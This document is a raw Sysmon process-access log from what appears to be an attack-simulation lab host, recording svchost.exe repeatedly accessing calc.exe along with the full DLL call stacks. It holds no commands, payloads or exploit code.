10341000x8000000000000000360206Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360205Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360204Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360203Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360202Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360201Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360200Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360199Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360198Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360197Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360196Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360195Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360194Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360193Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360192Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360191Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360190Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360189Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360188Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360187Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360186Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360185Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
